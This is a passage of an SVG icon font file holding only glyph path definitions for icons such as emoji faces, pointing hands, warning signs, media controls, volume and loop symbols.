172.498c5.326 10.706 8.338 22.756 8.338 35.502v96c0 44.112-35.888 80-80 80h-480c-44.112 0-80-35.888-80-80v-96c0-12.746 3.012-24.796 8.336-35.502-64.912 73.378-104.336 169.828-104.336 275.502 0 229.75 186.25 416 416 416s416-186.25 416-416c0-105.674-39.424-202.124-104.338-275.502zM728.236 703.044c-1.448-0.362-35.806-9.052-70.548-26.422-36.378-18.192-79.558-49.684-81.592-97.138-0.060-1.154-0.098-2.314-0.098-3.484 0-35.346 28.654-64 64-64s64 28.654 64 64c0 16.854-6.526 32.176-17.174 43.606 18.414 9.23 39.31 16.9 56.936 21.35 17.142 4.286 27.566 21.66 23.284 38.804-4.29 17.146-21.662 27.572-38.808 23.284z" />
<glyph unicode="&#xee4c;" glyph-name="frustrated2" d="M256 304v-96c0-8.674 7.328-16 16-16h112v128h-112c-8.672 0-16-7.326-16-16zM448 320h128v-128h-128v128zM752 320h-112v-128h112c8.674 0 16 7.326 16 16v96c0 8.674-7.326 16-16 16zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM576.096 579.484c2.034 47.454 45.212 78.946 81.592 97.138 34.742 17.37 69.102 26.060 70.548 26.422 17.146 4.288 34.518-6.138 38.806-23.284 4.284-17.144-6.14-34.518-23.284-38.804-17.624-4.45-38.522-12.12-56.936-21.35 10.648-11.43 17.174-26.752 17.174-43.606 0-35.346-28.654-64-64-64s-64 28.654-64 64c0.002 1.17 0.040 2.33 0.1 3.484zM256.958 679.76c4.288 17.146 21.66 27.572 38.806 23.284 1.446-0.362 35.806-9.052 70.548-26.422 36.38-18.192 79.56-49.684 81.592-97.138 0.062-1.154 0.098-2.314 0.098-3.484 0-35.346-28.654-64-64-64s-64 28.654-64 64c0 16.854 6.526 32.176 17.174 43.606-18.414 9.23-39.31 16.9-56.936 21.35-17.142 4.286-27.566 21.66-23.282 38.804zM832 208c0-44.112-35.888-80-80-80h-480c-44.112 0-80 35.888-80 80v96c0 44.112 35.888 80 80 80h480c44.112 0 80-35.888 80-80v-96z" />
<glyph unicode="&#xee4d;" glyph-name="crying" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM800 576h-128c-17.674 0-32 14.328-32 32s14.326 32 32 32h128c17.674 0 32-14.328 32-32s-14.326-32-32-32zM352 576h-128c-17.672 0-32 14.328-32 32s14.328 32 32 32h128c17.672 0 32-14.328 32-32s-14.328-32-32-32zM608 104c-8.19 0-16.378 3.124-22.626 9.374-4.582 4.582-29.42 14.626-73.374 14.626s-68.79-10.044-73.374-14.626c-12.496-12.496-32.758-12.496-45.254 0-12.498 12.496-12.498 32.758 0 45.254 30.122 30.12 92.994 33.372 118.628 33.372 25.632 0 88.506-3.252 118.626-33.374 12.498-12.496 12.498-32.758 0-45.254-6.248-6.248-14.436-9.372-22.626-9.372zM736 384c-17.674 0-32 14.326-32 32v64c0 17.672 14.326 32 32 32s32-14.328 32-32v-64c0-17.674-14.326-32-32-32zM736 192c-17.674 0-32 14.326-32 32v64c0 17.674 14.326 32 32 32s32-14.326 32-32v-64c0-17.674-14.326-32-32-32zM288 384c-17.672 0-32 14.326-32 32v64c0 17.672 14.328 32 32 32s32-14.328 32-32v-64c0-17.674-14.328-32-32-32zM288 192c-17.672 0-32 14.326-32 32v64c0 17.674 14.328 32 32 32s32-14.326 32-32v-64c0-17.674-14.328-32-32-32z" />
<glyph unicode="&#xee4e;" glyph-name="crying2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM320 224c0-17.674-14.328-32-32-32s-32 14.326-32 32v64c0 17.674 14.328 32 32 32s32-14.326 32-32v-64zM320 416c0-17.674-14.328-32-32-32s-32 14.326-32 32v64c0 17.672 14.328 32 32 32s32-14.328 32-32v-64zM352 576h-128c-17.672 0-32 14.328-32 32s14.328 32 32 32h128c17.672 0 32-14.328 32-32s-14.328-32-32-32zM630.626 113.374c-6.248-6.25-14.436-9.374-22.626-9.374s-16.378 3.124-22.626 9.374c-4.582 4.582-29.42 14.626-73.374 14.626s-68.79-10.044-73.374-14.626c-12.496-12.496-32.758-12.496-45.254 0-12.498 12.496-12.498 32.758 0 45.254 30.122 30.12 92.994 33.372 118.628 33.372 25.632 0 88.506-3.252 118.626-33.374 12.498-12.496 12.498-32.756 0-45.252zM768 224c0-17.674-14.326-32-32-32s-32 14.326-32 32v64c0 17.674 14.326 32 32 32s32-14.326 32-32v-64zM768 416c0-17.674-14.326-32-32-32s-32 14.326-32 32v64c0 17.672 14.326 32 32 32s32-14.328 32-32v-64zM800 576h-128c-17.674 0-32 14.328-32 32s14.326 32 32 32h128c17.674 0 32-14.328 32-32s-14.326-32-32-32z" />
<glyph unicode="&#xee4f;" glyph-name="point-up" d="M960 352v160c0 52.934-43.066 96-96 96-17.104 0-33.176-4.494-47.098-12.368-17.076 26.664-46.958 44.368-80.902 44.368-24.564 0-47.004-9.274-64-24.504-16.996 15.23-39.436 24.504-64 24.504-11.214 0-21.986-1.934-32-5.484v229.484c0 52.934-43.066 96-96 96s-96-43.066-96-96v-394.676l-176.018 93.836c-14.536 8.4-31.126 12.84-47.982 12.84-52.934 0-96-43.066-96-96 0-26.368 10.472-50.954 29.49-69.226 0.248-0.238 0.496-0.47 0.75-0.7l239.17-218.074h-45.41c-17.672 0-32-14.326-32-32v-192c0-17.674 14.328-32 32-32h640c17.674 0 32 14.326 32 32v192c0 17.674-14.326 32-32 32h-44.222l72.844 145.69c2.222 4.442 3.378 9.342 3.378 14.31zM896 96c0-17.674-14.326-32-32-32s-32 14.326-32 32 14.326 32 32 32 32-14.326 32-32zM896 359.554l-83.776-167.554h-383.826l-290.818 265.166c-6.18 6.070-9.58 14.164-9.58 22.834 0 17.644 14.356 32 32 32 5.46 0 10.612-1.31 15.324-3.894 0.53-0.324 1.070-0.632 1.622-0.926l224-119.416c9.92-5.288 21.884-4.986 31.52 0.8 9.638 5.782 15.534 16.196 15.534 27.436v448c0 17.644 14.356 32 32 32s32-14.356 32-32v-320c0-17.672 14.326-32 32-32s32 14.328 32 32c0 17.644 14.356 32 32 32s32-14.356 32-32c0-17.672 14.326-32 32-32s32 14.328 32 32c0 17.644 14.356 32 32 32s32-14.356 32-32v-32c0-17.672 14.326-32 32-32s32 14.328 32 32c0 17.644 14.356 32 32 32s32-14.356 32-32v-152.446z" />
<glyph unicode="&#xee50;" glyph-name="point-right" d="M416 0h160c52.934 0 96 43.066 96 96 0 17.104-4.494 33.176-12.368 47.098 26.664 17.076 44.368 46.958 44.368 80.902 0 24.564-9.276 47.004-24.504 64 15.228 16.996 24.504 39.436 24.504 64 0 11.214-1.934 21.986-5.484 32h229.484c52.934 0 96 43.066 96 96s-43.066 96-96 96h-394.676l93.836 176.018c8.4 14.536 12.84 31.126 12.84 47.982 0 52.934-43.066 96-96 96-26.368 0-50.954-10.472-69.226-29.49-0.238-0.248-0.47-0.496-0.7-0.75l-218.074-239.17v45.41c0 17.672-14.326 32-32 32h-192c-17.674 0-32-14.328-32-32v-640c0-17.674 14.326-32 32-32h192c17.674 0 32 14.326 32 32v44.222l145.69-72.844c4.444-2.222 9.342-3.378 14.31-3.378zM160 64c-17.674 0-32 14.326-32 32s14.326 32 32 32 32-14.326 32-32-14.326-32-32-32zM423.556 64l-167.556 83.778v383.824l265.168 290.818c6.066 6.18 14.162 9.58 22.832 9.58 17.644 0 32-14.356 32-32 0-5.46-1.308-10.612-3.894-15.324-0.324-0.53-0.632-1.070-0.926-1.622l-119.418-224c-5.288-9.92-4.986-21.884 0.8-31.52 5.784-9.638 16.198-15.534 27.438-15.534h448c17.644 0 32-14.356 32-32s-14.356-32-32-32h-320c-17.672 0-32-14.326-32-32s14.328-32 32-32c17.644 0 32-14.356 32-32s-14.356-32-32-32c-17.674 0-32-14.326-32-32s14.326-32 32-32c17.644 0 32-14.356 32-32s-14.356-32-32-32h-32c-17.674 0-32-14.326-32-32s14.326-32 32-32c17.644 0 32-14.356 32-32s-14.356-32-32-32h-152.444z" />
<glyph unicode="&#xee51;" glyph-name="point-down" d="M960 544v-160c0-52.934-43.066-96-96-96-17.104 0-33.176 4.494-47.098 12.368-17.076-26.662-46.96-44.368-80.902-44.368-24.564 0-47.004 9.276-64 24.504-16.996-15.228-39.436-24.504-64-24.504-11.214 0-21.986 1.934-32 5.484v-229.484c0-52.934-43.066-96-96-96-52.936 0-96 43.066-96 96v394.676l-176.018-93.836c-14.538-8.398-31.126-12.84-47.982-12.84-52.936 0-96 43.066-96 96 0 26.368 10.472 50.952 29.488 69.226 0.248 0.238 0.496 0.47 0.75 0.7l239.17 218.074h-45.408c-17.674 0-32 14.326-32 32v192c0 17.674 14.326 32 32 32h640c17.674 0 32-14.326 32-32v-192c0-17.674-14.326-32-32-32h-44.222l72.842-145.69c2.224-4.442 3.38-9.342 3.38-14.31zM896 800c0 17.674-14.326 32-32 32s-32-14.326-32-32 14.326-32 32-32 32 14.326 32 32zM896 536.446l-83.778 167.554h-383.824l-290.82-265.168c-6.18-6.066-9.578-14.162-9.578-22.832 0-17.644 14.356-32 32-32 5.458 0 10.612 1.308 15.324 3.894 0.53 0.324 1.070 0.632 1.622 0.926l224 119.416c9.92 5.288 21.884 4.986 31.52-0.8 9.638-5.782 15.534-16.196 15.534-27.436v-448c0-17.644 14.356-32 32-32s32 14.356 32 32v320c0 17.672 14.326 32 32 32s32-14.328 32-32c0-17.644 14.356-32 32-32s32 14.356 32 32c0 17.674 14.326 32 32 32s32-14.326 32-32c0-17.644 14.356-32 32-32s32 14.356 32 32v32c0 17.674 14.326 32 32 32s32-14.326 32-32c0-17.644 14.356-32 32-32s32 14.356 32 32v152.446z" />
<glyph unicode="&#xee52;" glyph-name="point-left" d="M608 0h-160c-52.934 0-96 43.066-96 96 0 17.104 4.494 33.176 12.368 47.098-26.662 17.076-44.368 46.958-44.368 80.902 0 24.564 9.276 47.004 24.504 64-15.228 16.996-24.504 39.436-24.504 64 0 11.214 1.934 21.986 5.484 32h-229.484c-52.934 0-96 43.066-96 96 0 52.936 43.066 96 96 96h394.676l-93.836 176.018c-8.398 14.536-12.84 31.126-12.84 47.982 0 52.936 43.066 96 96 96 26.368 0 50.952-10.472 69.224-29.488 0.238-0.248 0.472-0.496 0.7-0.75l218.076-239.17v45.408c0 17.674 14.326 32 32 32h192c17.674 0 32-14.326 32-32v-640c0-17.674-14.326-32-32-32h-192c-17.674 0-32 14.326-32 32v44.222l-145.69-72.844c-4.442-2.222-9.34-3.378-14.31-3.378zM864 64c17.674 0 32 14.326 32 32s-14.326 32-32 32-32-14.326-32-32 14.326-32 32-32zM600.446 64l167.554 83.778v383.824l-265.168 290.82c-6.066 6.18-14.162 9.578-22.832 9.578-17.644 0-32-14.356-32-32 0-5.458 1.308-10.612 3.894-15.324 0.324-0.53 0.632-1.070 0.926-1.622l119.416-224c5.29-9.92 4.988-21.884-0.798-31.52-5.784-9.638-16.198-15.534-27.438-15.534h-448c-17.644 0-32-14.356-32-32s14.356-32 32-32h320c17.672 0 32-14.326 32-32s-14.328-32-32-32c-17.644 0-32-14.356-32-32s14.356-32 32-32c17.674 0 32-14.326 32-32s-14.326-32-32-32c-17.644 0-32-14.356-32-32s14.356-32 32-32h32c17.674 0 32-14.326 32-32s-14.326-32-32-32c-17.644 0-32-14.356-32-32s14.356-32 32-32h152.446z" />
<glyph unicode="&#xee53;" glyph-name="warning" d="M512 867.226l429.102-855.226h-858.206l429.104 855.226zM512 960c-22.070 0-44.14-14.882-60.884-44.648l-437.074-871.112c-33.486-59.532-5-108.24 63.304-108.24h869.308c68.3 0 96.792 48.708 63.3 108.24h0.002l-437.074 871.112c-16.742 29.766-38.812 44.648-60.882 44.648v0zM576 128c0-35.346-28.654-64-64-64s-64 28.654-64 64c0 35.346 28.654 64 64 64s64-28.654 64-64zM512 256c-35.346 0-64 28.654-64 64v192c0 35.346 28.654 64 64 64s64-28.654 64-64v-192c0-35.346-28.654-64-64-64z" />
<glyph unicode="&#xee54;" glyph-name="notification" d="M512 864c-111.118 0-215.584-43.272-294.156-121.844s-121.844-183.038-121.844-294.156c0-111.118 43.272-215.584 121.844-294.156s183.038-121.844 294.156-121.844c111.118 0 215.584 43.272 294.156 121.844s121.844 183.038 121.844 294.156c0 111.118-43.272 215.584-121.844 294.156s-183.038 121.844-294.156 121.844zM512 960v0c282.77 0 512-229.23 512-512s-229.23-512-512-512c-282.77 0-512 229.23-512 512s229.23 512 512 512zM448 256h128v-128h-128zM448 768h128v-384h-128z" />
<glyph unicode="&#xee55;" glyph-name="question" d="M448 256h128v-128h-128zM704 704c35.346 0 64-28.654 64-64v-192l-192-128h-128v64l192 128v64h-320v128h384zM512 864c-111.118 0-215.584-43.272-294.156-121.844s-121.844-183.038-121.844-294.156c0-111.118 43.272-215.584 121.844-294.156s183.038-121.844 294.156-121.844c111.118 0 215.584 43.272 294.156 121.844s121.844 183.038 121.844 294.156c0 111.118-43.272 215.584-121.844 294.156s-183.038 121.844-294.156 121.844zM512 960v0c282.77 0 512-229.23 512-512s-229.23-512-512-512c-282.77 0-512 229.23-512 512s229.23 512 512 512z" />
<glyph unicode="&#xee56;" glyph-name="plus" d="M992 576h-352v352c0 17.672-14.328 32-32 32h-192c-17.672 0-32-14.328-32-32v-352h-352c-17.672 0-32-14.328-32-32v-192c0-17.672 14.328-32 32-32h352v-352c0-17.672 14.328-32 32-32h192c17.672 0 32 14.328 32 32v352h352c17.672 0 32 14.328 32 32v192c0 17.672-14.328 32-32 32z" />
<glyph unicode="&#xee57;" glyph-name="minus" d="M0 544v-192c0-17.672 14.328-32 32-32h960c17.672 0 32 14.328 32 32v192c0 17.672-14.328 32-32 32h-960c-17.672 0-32-14.328-32-32z" />
<glyph unicode="&#xee58;" glyph-name="info" d="M448 656c0 26.4 21.6 48 48 48h32c26.4 0 48-21.6 48-48v-32c0-26.4-21.6-48-48-48h-32c-26.4 0-48 21.6-48 48v32zM640 192h-256v64h64v192h-64v64h192v-256h64zM512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416z" />
<glyph unicode="&#xee59;" glyph-name="cancel-circle" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM672 704l-160-160-160 160-96-96 160-160-160-160 96-96 160 160 160-160 96 96-160 160 160 160z" />
<glyph unicode="&#xee5a;" glyph-name="blocked" d="M874.040 810.040c-96.706 96.702-225.28 149.96-362.040 149.96s-265.334-53.258-362.040-149.96c-96.702-96.706-149.96-225.28-149.96-362.040s53.258-265.334 149.96-362.040c96.706-96.702 225.28-149.96 362.040-149.96s265.334 53.258 362.040 149.96c96.702 96.706 149.96 225.28 149.96 362.040s-53.258 265.334-149.96 362.040zM896 448c0-82.814-26.354-159.588-71.112-222.38l-535.266 535.268c62.792 44.758 139.564 71.112 222.378 71.112 211.738 0 384-172.262 384-384zM128 448c0 82.814 26.354 159.586 71.112 222.378l535.27-535.268c-62.794-44.756-139.568-71.11-222.382-71.11-211.738 0-384 172.262-384 384z" />
<glyph unicode="&#xee5b;" glyph-name="cross" d="M1014.662 137.34c-0.004 0.004-0.008 0.008-0.012 0.010l-310.644 310.65 310.644 310.65c0.004 0.004 0.008 0.006 0.012 0.010 3.344 3.346 5.762 7.254 7.312 11.416 4.246 11.376 1.824 24.682-7.324 33.83l-146.746 146.746c-9.148 9.146-22.45 11.566-33.828 7.32-4.16-1.55-8.070-3.968-11.418-7.31 0-0.004-0.004-0.006-0.008-0.010l-310.648-310.652-310.648 310.65c-0.004 0.004-0.006 0.006-0.010 0.010-3.346 3.342-7.254 5.76-11.414 7.31-11.38 4.248-24.682 1.826-33.83-7.32l-146.748-146.748c-9.148-9.148-11.568-22.452-7.322-33.828 1.552-4.16 3.97-8.072 7.312-11.416 0.004-0.002 0.006-0.006 0.010-0.010l310.65-310.648-310.65-310.652c-0.002-0.004-0.006-0.006-0.008-0.010-3.342-3.346-5.76-7.254-7.314-11.414-4.248-11.376-1.826-24.682 7.322-33.83l146.748-146.746c9.15-9.148 22.452-11.568 33.83-7.322 4.16 1.552 8.070 3.97 11.416 7.312 0.002 0.004 0.006 0.006 0.010 0.010l310.648 310.65 310.648-310.65c0.004-0.002 0.008-0.006 0.012-0.008 3.348-3.344 7.254-5.762 11.414-7.314 11.378-4.246 24.684-1.826 33.828 7.322l146.746 146.748c9.148 9.148 11.57 22.454 7.324 33.83-1.552 4.16-3.97 8.068-7.314 11.414z" />
<glyph unicode="&#xee5c;" glyph-name="checkmark" d="M864 832l-480-480-224 224-160-160 384-384 640 640z" />
<glyph unicode="&#xee5d;" glyph-name="checkmark2" d="M397.434 42.304l-397.868 391.6 197.378 194.27 200.49-197.332 429.62 422.852 197.378-194.27-626.998-617.12zM107.912 433.904l289.524-284.962 518.656 510.482-89.036 87.632-429.62-422.852-200.49 197.334-89.034-87.634z" />
<glyph unicode="&#xee5e;" glyph-name="spell-check" d="M128 704h128v-192h64v384c0 35.2-28.8 64-64 64h-128c-35.2 0-64-28.8-64-64v-384h64v192zM128 896h128v-128h-128v128zM960 896v64h-192c-35.202 0-64-28.8-64-64v-320c0-35.2 28.798-64 64-64h192v64h-192v320h192zM640 800v96c0 35.2-28.8 64-64 64h-192v-448h192c35.2 0 64 28.8 64 64v96c0 35.2-8.8 64-44 64 35.2 0 44 28.8 44 64zM576 576h-128v128h128v-128zM576 768h-128v128h128v-128zM832 384l-416-448-224 288 82 70 142-148 352 302z" />
<glyph unicode="&#xee5f;" glyph-name="enter" d="M384 448h-320v128h320v128l192-192-192-192zM1024 960v-832l-384-192v192h-384v256h64v-192h320v576l256 128h-576v-256h-64v320z" />
<glyph unicode="&#xee60;" glyph-name="exit" d="M768 320v128h-320v128h320v128l192-192zM704 384v-256h-320v-192l-384 192v832h704v-320h-64v256h-512l256-128v-576h256v192z" />
<glyph unicode="&#xee61;" glyph-name="play2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM384 672l384-224-384-224z" />
<glyph unicode="&#xee62;" glyph-name="pause" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM320 640h128v-384h-128zM576 640h128v-384h-128z" />
<glyph unicode="&#xee63;" glyph-name="stop" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM320 640h384v-384h-384z" />
<glyph unicode="&#xee64;" glyph-name="previous" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM448 448l256 192v-384zM320 640h128v-384h-128v384z" />
<glyph unicode="&#xee65;" glyph-name="next" d="M512 960c282.77 0 512-229.23 512-512s-229.23-512-512-512-512 229.23-512 512 229.23 512 512 512zM512 32c229.75 0 416 186.25 416 416s-186.25 416-416 416-416-186.25-416-416 186.25-416 416-416zM576 448l-256 192v-384zM704 640h-128v-384h128v384z" />
<glyph unicode="&#xee66;" glyph-name="backward" d="M512-64c282.77 0 512 229.23 512 512s-229.23 512-512 512-512-229.23-512-512 229.23-512 512-512zM512 864c229.75 0 416-186.25 416-416s-186.25-416-416-416-416 186.25-416 416 186.25 416 416 416zM704 288l-224 160 224 160zM448 288l-224 160 224 160z" />
<glyph unicode="&#xee67;" glyph-name="forward2" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM512 32c-229.75 0-416 186.25-416 416s186.25 416 416 416 416-186.25 416-416-186.25-416-416-416zM320 608l224-160-224-160zM576 608l224-160-224-160z" />
<glyph unicode="&#xee68;" glyph-name="play3" d="M192 832l640-384-640-384z" />
<glyph unicode="&#xee69;" glyph-name="pause2" d="M128 832h320v-768h-320zM576 832h320v-768h-320z" />
<glyph unicode="&#xee6a;" glyph-name="stop2" d="M128 832h768v-768h-768z" />
<glyph unicode="&#xee6b;" glyph-name="backward2" d="M576 800v-320l320 320v-704l-320 320v-320l-352 352z" />
<glyph unicode="&#xee6c;" glyph-name="forward3" d="M512 96v320l-320-320v704l320-320v320l352-352z" />
<glyph unicode="&#xee6d;" glyph-name="first" d="M128 64v768h128v-352l320 320v-320l320 320v-704l-320 320v-320l-320 320v-352z" />
<glyph unicode="&#xee6e;" glyph-name="last" d="M896 832v-768h-128v352l-320-320v320l-320-320v704l320-320v320l320-320v352z" />
<glyph unicode="&#xee6f;" glyph-name="previous2" d="M256 64v768h128v-352l320 320v-704l-320 320v-352z" />
<glyph unicode="&#xee70;" glyph-name="next2" d="M768 832v-768h-128v352l-320-320v704l320-320v352z" />
<glyph unicode="&#xee71;" glyph-name="eject" d="M0 192h1024v-128h-1024zM512 832l512-512h-1024z" />
<glyph unicode="&#xee72;" glyph-name="volume-high" horiz-adv-x="1088" d="M890.040 37.96c-12.286 0-24.566 4.686-33.942 14.056-18.744 18.746-18.744 49.136 0 67.882 87.638 87.642 135.904 204.16 135.904 328.1 0 123.938-48.266 240.458-135.904 328.098-18.744 18.746-18.744 49.138 0 67.882s49.138 18.744 67.882 0c105.77-105.772 164.022-246.4 164.022-395.98s-58.252-290.208-164.022-395.98c-9.372-9.372-21.656-14.058-33.94-14.058zM719.53 128.47c-12.286 0-24.566 4.686-33.942 14.056-18.744 18.744-18.744 49.136 0 67.882 131.006 131.006 131.006 344.17 0 475.176-18.744 18.746-18.744 49.138 0 67.882 18.744 18.742 49.138 18.744 67.882 0 81.594-81.59 126.53-190.074 126.53-305.466 0-115.39-44.936-223.876-126.53-305.47-9.372-9.374-21.656-14.060-33.94-14.060v0zM549.020 218.98c-12.286 0-24.568 4.686-33.942 14.058-18.746 18.746-18.746 49.134 0 67.88 81.1 81.1 81.1 213.058 0 294.156-18.746 18.746-18.746 49.138 0 67.882s49.136 18.744 67.882 0c118.53-118.53 118.53-311.392 0-429.922-9.372-9.368-21.656-14.054-33.94-14.054zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee73;" glyph-name="volume-medium" d="M719.53 128.47c-12.286 0-24.566 4.686-33.942 14.056-18.744 18.744-18.744 49.136 0 67.882 131.006 131.006 131.006 344.17 0 475.176-18.744 18.746-18.744 49.138 0 67.882 18.744 18.742 49.138 18.744 67.882 0 81.594-81.59 126.53-190.074 126.53-305.466 0-115.39-44.936-223.876-126.53-305.47-9.372-9.374-21.656-14.060-33.94-14.060v0zM549.020 218.98c-12.286 0-24.566 4.686-33.942 14.058-18.746 18.746-18.746 49.134 0 67.88 81.1 81.1 81.1 213.058 0 294.156-18.746 18.746-18.746 49.138 0 67.882s49.136 18.744 67.882 0c118.53-118.53 118.53-311.392 0-429.922-9.372-9.368-21.656-14.054-33.94-14.054zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee74;" glyph-name="volume-low" d="M549.020 218.98c-12.286 0-24.566 4.686-33.942 14.058-18.746 18.746-18.746 49.134 0 67.88 81.1 81.1 81.1 213.058 0 294.156-18.746 18.746-18.746 49.138 0 67.882s49.136 18.744 67.882 0c118.53-118.53 118.53-311.392 0-429.922-9.372-9.368-21.656-14.054-33.94-14.054zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee75;" glyph-name="volume-mute" d="M416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee76;" glyph-name="volume-mute2" d="M960 340.852v-84.852h-84.852l-107.148 107.148-107.148-107.148h-84.852v84.852l107.148 107.148-107.148 107.148v84.852h84.852l107.148-107.148 107.148 107.148h84.852v-84.852l-107.148-107.148 107.148-107.148zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee77;" glyph-name="volume-increase" d="M1024 384h-192v-192h-128v192h-192v128h192v192h128v-192h192v-128zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee78;" glyph-name="volume-decrease" d="M512 512h512v-128h-512v128zM416.006 0c-8.328 0-16.512 3.25-22.634 9.374l-246.626 246.626h-114.746c-17.672 0-32 14.326-32 32v320c0 17.672 14.328 32 32 32h114.746l246.626 246.628c9.154 9.154 22.916 11.89 34.874 6.936 11.958-4.952 19.754-16.622 19.754-29.564v-832c0-12.944-7.796-24.612-19.754-29.564-3.958-1.64-8.118-2.436-12.24-2.436z" />
<glyph unicode="&#xee79;" glyph-name="loop" d="M128 640h640v-192l256 256-256 256v-192h-768v-384h128zM896 256h-640v192l-256-256 256-256v192h768v384h-128z" />
<glyph unicode="&#xee7a;" glyph-name="loop2" d="M889.68 793.68c-93.608 102.216-228.154 166.32-377.68 166.32-282.77 0-512-229.23-512-512h96c0 229.75 186.25 416 416 416 123.020 0 233.542-53.418 309.696-138.306l-149.696-149.694h352v352l-134.32-134.32zM928 448c0-229.75-186.25-416-416-416-123.020 0-233.542 53.418-309.694 138.306l149.694 149.694h-352v-352l134.32 134.32c93.608-102.216 228.154-166.32 377.68-166.32 282.77 0 512 229.23 512 512h-96z" />
<glyph unicode="&#xee7b;" glyph-name="infinite" d="M783.988 207.988c-64.104 0-124.372 24.96-169.7 70.288l-102.288 102.282-102.276-102.27c-45.332-45.336-105.6-70.3-169.706-70.3-64.118 0-124.39 24.964-169.722 70.3-45.332 45.334-70.296 105.604-70.296 169.712s24.964 124.38 70.296 169.714c45.334 45.332 105.608 70.296 169.714 70.296 64.108 0 124.38-24.964 169.712-70.296l102.278-102.276 102.276 102.276c45.332 45.332 105.604 70.298 169.712 70.298 64.112 0 124.384-24.966 169.71-70.298 45.338-45.334 70.302-105.606 70.302-169.714 0-64.112-24.964-124.382-70.3-169.71-45.326-45.336-105.598-70.302-169.712-70.302zM681.72 345.712c27.322-27.31 63.64-42.354 102.268-42.352 38.634 0 74.958 15.044 102.276 42.362 27.316 27.322 42.364 63.644 42.364 102.278s-15.046 74.956-42.364 102.274c-27.32 27.318-63.64 42.364-102.276 42.364-38.632 0-74.956-15.044-102.278-42.364l-102.268-102.274 102.278-102.288zM240.012 592.638c-38.634 0-74.956-15.044-102.274-42.364-27.32-27.318-42.364-63.64-42.364-102.274 0-38.632 15.044-74.954 42.364-102.276 27.32-27.316 63.642-42.364 102.274-42.364 38.634 0 74.956 15.044 102.272 42.362l102.276 102.278-102.276 102.274c-27.318 27.32-63.64 42.366-102.272 42.364v0z" />
<glyph unicode="&#xee7c;" glyph-name="shuffle" d="M768 256h-101.49l-160 160 160 160h101.49v-160l224 224-224 224v-160h-128c-16.974 0-33.252-6.744-45.254-18.746l-178.746-178.744-178.746 178.746c-12 12-28.28 18.744-45.254 18.744h-192v-128h165.49l160-160-160-160h-165.49v-128h192c16.974 0 33.252 6.742 45.254 18.746l178.746 178.744 178.746-178.744c12.002-12.004 28.28-18.746 45.254-18.746h128v-160l224 224-224 224v-160z" />
<glyph unicode="&#xee7d;" glyph-name="arrow-up-left" d="M0 224l256 256 544-544 224 224-544 544 255.998 256h-735.998v-736z" />
